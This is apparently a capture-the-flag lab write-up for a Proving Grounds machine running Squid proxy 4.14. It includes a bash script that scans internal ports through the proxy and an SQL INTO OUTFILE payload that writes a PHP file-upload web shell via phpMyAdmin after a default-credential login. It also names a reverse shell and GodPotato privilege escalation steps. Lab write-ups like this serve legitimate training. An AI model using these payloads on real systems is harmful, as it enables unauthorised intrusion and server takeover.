Squid - Proving Grounds Practice
Enumeration
Nmap
Initial nmap scan revealed that target was running Squid Proxy.
It was version 4.14.
Exploitation
Squid Proxy
At first I tested squid proxy with my own web server and made sure it was working.
Then I created a bash script to enumerate internal ports of the target.
#!/bin/bash
# Proxy details
proxy_address="192.168.157.189"
proxy_port="3128"
# Target IP and ports
target_ip="127.0.0.1"
ports=("80" "443" "8000" "8080")
for port in "${ports[@]}"; do
response=$(curl -x $proxy_address:$proxy_port $target_ip:$port -I | grep -i HTTP/1.1 | cut -d ' ' -f 2)
if [ "$response" -eq 200 ]; then
echo "Response from $target_ip:$port with status code $response"
fi
done
And this revealed that port 8080 was up.
I then set the foxyproxy up and started enumerating target port.
PhpMyAdmin
There was a phpmyadmin application running. I tried default credentials root: and it worked.
Then I used SQL query tab to write a file. I found this which creates an uploader.php file.
SELECT
"<?php echo \'<form action=\"\" method=\"post\" enctype=\"multipart/form-data\" name=\"uploader\" id=\"uploader\">\';echo \'<input type=\"file\" name=\"file\" size=\"50\"><input name=\"_upl\" type=\"submit\" id=\"_upl\" value=\"Upload\"></form>\'; if( $_POST[\'_upl\'] == \"Upload\" ) { if(@copy($_FILES[\'file\'][\'tmp_name\'], $_FILES[\'file\'][\'name\'])) { echo \'<b>Upload Done.<b><br><br>\'; }else { echo \'<b>Upload Failed.</b><br><br>\'; }}?>"
INTO OUTFILE 'C:/wamp/www/uploader.php';
Then simply uploaded reverse shell from ivan-sincek/php-reverse-shell and obtained local service shell.
Then I read the local flag.
Privilege Escalation
SeImpersonatePrivilege
I found out that current account had SeImpersonatePrivilege on the target.
I simply used GodPatato with nc64.exe to obtain SYSTEM shell.